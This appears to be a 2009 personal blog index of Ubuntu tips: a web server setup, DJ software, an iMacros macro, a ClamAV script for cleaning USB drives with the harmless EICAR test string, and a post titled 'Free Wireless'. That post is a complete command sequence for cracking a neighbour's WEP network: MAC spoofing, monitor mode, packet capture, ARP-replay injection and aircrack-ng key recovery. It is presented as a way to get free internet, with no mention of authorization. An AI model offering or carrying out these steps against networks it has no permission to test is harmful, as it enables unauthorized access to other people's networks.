sábado, 26 de septiembre de 2009
Monkey HTTP Daemon on Ubuntu
sudo apt-get install php5-cgi php5-common monkey
Check php configuration on /etc/monkey/monkey.conf:
AddScript application/x-httpd-php /usr/bin/php5-cgi php
Screenshoots:


Monkey HTTP Daemon [ http://monkeyd.sourceforge.net ]
domingo, 20 de septiembre de 2009
DJ Tools
- Audacity (Editor and recorder)
- LMMS (Produce music and mixing sounds)
- Mixxx (Perform live mix)
Screens:



Install on Ubuntu this stuff:
sudo apt-get install lmms mixxx audacity
lunes, 17 de agosto de 2009
Gedit iMacros Syntax Hightlight
Download iMacros Firefox Add-on
Download imacros.lang
cp imacros.lang /usr/share/gtksourceview-2.0/language-specs
This example open this page and remove the “Tsuru Banner”:
' FAKE YOUR USERAGENT
SET !USERAGENT Mozilla/4.0<sp>(compatible;<sp>MSIE<sp>7.0;<sp>Windows<sp>NT<sp>5.1)
URL GOTO=http://albertux.ayalasoft.com
' I KNOW SOMETIMES MY WEB IS SLOW
WAIT SECONDS=6
' CLOSE THE CAR BANNER
TAG POS=1 TYPE=SPAN ATTR=TXT:Close
Screenshoot:

miércoles, 12 de agosto de 2009
Free Wireless
Using Ubuntu 9.04:
sudo apt-get install aircrack-ng macchanger
The device name could be different on your machine
sudo airmon-ng stop wlan0
sudo airmon-ng start wlan0
sudo ifconfig wlan0 down
sudo ifconfig mon0 down
sudo macchanger -m $FAKEMAC wlan0
sudo macchanger -m $FAKEMAC mon0
sudo ifconfig mon0 up
sudo airodump-ng mon0 # See all available networks choose one channel
Inject packets:
# terminal 01
sudo airodump-ng mon0 -w wdata -c 6 --bssid 00:00:00:00:00:00 # -c $CHANNEL
# terminal 02
watch sudo aireplay-ng -1 0 -e $SSID -a 00:00:00:00:00:00 -h $FAKEMAC mon0
# terminal 03
sudo aireplay-ng -3 -b 00:00:00:00:00:00 -h $FAKEMAC mon0
# wait some time to get 30,000 on Data on terminal 01
Now get the password:
sudo aircrack-ng wdata-*.cap
See Screens:


martes, 14 de julio de 2009
USB Scan Antivirus
I made this script to clean USB Drives:
usbscan.sh:
#!/bin/bash
# Author: Albertux (Alberto Isaac Ayala Esquivias)
# Email: <albertoi7@gmail.com>
# Web: http://www.AyalaSoft.com
#
# First install clamav: sudo apt-get install clamav
# copy usbcan.desktop on /home/$USER/Desktop
# copy usbscan on /home/$USER/bin/
#
# This script tested on Debian or Ubuntu
USB="sdb1" # check first using mount command or cat /etc/mtab
IFS=$'\t\n'
LIGHT_RED="\033[1;31m"
LIGHT_GREEN="\033[1;32m"
LIGHT_BLUE="\033[1;34m"
YELLOW="\033[1;33m"
NORMAL="\033[0m"
echo -e "${LIGHT_GREEN}"
echo "# # #### #### #### #### ### # #"
echo "# # # # # # # # # ## #"
echo "# # ### #### # ### # ##### # # #"
echo "# # # # # # # # # # ##"
echo " ### #### #### #### #### # # # #"
echo -e "${NORMAL}"
echo -n "Inserte el USB y precione [Enter]"
read
sleep 5
USB_TMP=`cat /etc/mtab | grep $USB | awk '{print $2}'`
USB_PATH=`echo $USB_TMP | sed -e 's/\\\040/ /g'`
if [ -z $USB_PATH ];
then
echo -en "\n${LIGHT_RED}AVIZO!${NORMAL} \"USB no detectado, precione [Enter]\""
read
exit
fi
echo -e "\nUSB localizado en [${LIGHT_BLUE}$USB_PATH${NORMAL}]"
echo -e "\n${YELLOW}AVIZO!${NORMAL} \"No desconecte el USB hasta que se le indique\"\n"
clamscan --remove --infected --recursive $USB_PATH > usbscan.log 2> usbscan.err.log
umount /dev/sdb1
echo -en "\n${YELLOW}LISTO!${NORMAL} \"Puede desconectar el USB, precione [Enter]\""
read
usbscan.desktop:
[Desktop Entry]
Encoding=UTF-8
Version=1.0
Type=Application
Terminal=true
Icon[en_US]=gnome-panel-launcher
Exec=/home/aayala/usbscan.sh
Name[en_US]=USB SCAN
Name=Antivirus
Icon=/home/aayala/bin/.virus.png
eicar.com (virus test file):
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
virus.png:

Notes:
The scan is slow but efective
Recent Comments